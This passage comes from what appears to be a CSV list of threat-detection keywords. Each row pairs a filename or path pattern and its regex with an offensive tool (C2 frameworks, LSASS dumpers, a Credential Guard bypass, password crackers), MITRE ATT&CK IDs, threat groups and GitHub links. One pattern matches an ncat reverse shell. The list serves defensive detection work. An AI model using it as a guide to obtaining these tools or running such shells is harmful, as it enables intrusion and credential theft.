Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8982" "*/Mystikal.git*",".{0,1000}\/Mystikal\.git.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","8983" "*/mystikal.py*",".{0,1000}\/mystikal\.py.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tool","https://github.com/D00MFist/Mystikal","1","1","N/A","N/A","9","4","305","39","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z","8984" "*/Mythic/mythic*",".{0,1000}\/Mythic\/mythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","8985" "*/Mythic_CLI*",".{0,1000}\/Mythic_CLI.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black 
Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","8986" "*/MythicAgents/*",".{0,1000}\/MythicAgents\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","8987" "*/MythicAgents/*",".{0,1000}\/MythicAgents\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8988" "*/MythicC2Profiles/*",".{0,1000}\/MythicC2Profiles\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","8989" "*/mythic-cli*",".{0,1000}\/mythic\-cli.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black 
Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","8990" "*/MythicConfig.cs*",".{0,1000}\/MythicConfig\.cs.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8991" "*/mythic-react-docker*",".{0,1000}\/mythic\-react\-docker.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","8992" "*/mzet-/les-res*",".{0,1000}\/mzet\-\/les\-res.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","8995" "*/n0kovo_subdomains_huge.txt*",".{0,1000}\/n0kovo_subdomains_huge\.txt.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability 
Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","8996" "*/n1nj4sec/pupy*",".{0,1000}\/n1nj4sec\/pupy.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8997" "*/NachoVPN.git*",".{0,1000}\/NachoVPN\.git.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","1","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","8998" "*/nachovpn:release*",".{0,1000}\/nachovpn\:release.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","1","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","8999" "*/nachovpn-1.0.0-py3-none-any.whl*",".{0,1000}\/nachovpn\-1\.0\.0\-py3\-none\-any\.whl.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a 
Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","1","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","9000" "*/NamedPipeMaster.git*",".{0,1000}\/NamedPipeMaster\.git.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","9001" "*/NamedPipeMaster/tarball/*",".{0,1000}\/NamedPipeMaster\/tarball\/.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","9002" "*/NamedPipeMaster/zipball/*",".{0,1000}\/NamedPipeMaster\/zipball\/.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","9003" "*/NamedPipeMasterBase/*",".{0,1000}\/NamedPipeMasterBase\/.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - 
T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","1","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","9004" "*/NamelessC2.git*",".{0,1000}\/NamelessC2\.git.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","1","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","9005" "*/NamelessLog.txt*",".{0,1000}\/NamelessLog\.txt.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#linux","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","9006" "*/nanodump*",".{0,1000}\/nanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","9008" "*/nanodump.*",".{0,1000}\/nanodump\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","9009" "*/nanodump.py*",".{0,1000}\/nanodump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","9010" "*/nanorobeus.git*",".{0,1000}\/nanorobeus\.git.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","9011" "*/nanorubeus/*",".{0,1000}\/nanorubeus\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","9012" "*/Native/SigFlip/*",".{0,1000}\/Native\/SigFlip\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR 
- Sandworm","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","N/A","10","10","1139","197","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z","9013" "*/NativeBypassCredGuard.git*",".{0,1000}\/NativeBypassCredGuard\.git.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","1","N/A","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","9014" "*/NativeDump.exe*",".{0,1000}\/NativeDump\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","9015" "*/NativeDump.git*",".{0,1000}\/NativeDump\.git.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","1","N/A","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","9016" "*/nat-pmp-info.nse*",".{0,1000}\/nat\-pmp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9017" "*/nat-pmp-mapport.nse*",".{0,1000}\/nat\-pmp\-mapport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9018" "*/navicatpwd.exe*",".{0,1000}\/navicatpwd\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","9020" "*/nbd-info.nse*",".{0,1000}\/nbd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9021" "*/nbns-interfaces.nse*",".{0,1000}\/nbns\-interfaces\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9022" "*/nbnsspoof.py*",".{0,1000}\/nbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","9023" "*/nbstat.nse*",".{0,1000}\/nbstat\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9024" "*/NBTNS.py*",".{0,1000}\/NBTNS\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","N/A","10","4656","1722","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z","9025" "*/nc_srv.bat",".{0,1000}\/nc_srv\.bat","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","9026" "*/ncat * -e sh*",".{0,1000}\/ncat\s.{0,1000}\s\-e\ssh.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","#linux","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","9030" "*/nccgroup/nccfsas/*",".{0,1000}\/nccgroup\/nccfsas\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","N/A","10","10","611","110","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z","9031" "*/ncp-enum-users.nse*",".{0,1000}\/ncp\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9032" "*/ncp-serverinfo.nse*",".{0,1000}\/ncp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9033" "*/ncrack-*",".{0,1000}\/ncrack\-.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","0","#linux","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","9034" "*/ncrack.git*",".{0,1000}\/ncrack\.git.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","9035" "*/ndmp-fs-info.nse*",".{0,1000}\/ndmp\-fs\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9036" "*/ndmp-version.nse*",".{0,1000}\/ndmp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","9037" "*/ndp_spoof*",".{0,1000}\/ndp_spoof.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","9038" "*/ndroRat Binder.exe*",".{0,1000}\/ndroRat\sBinder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
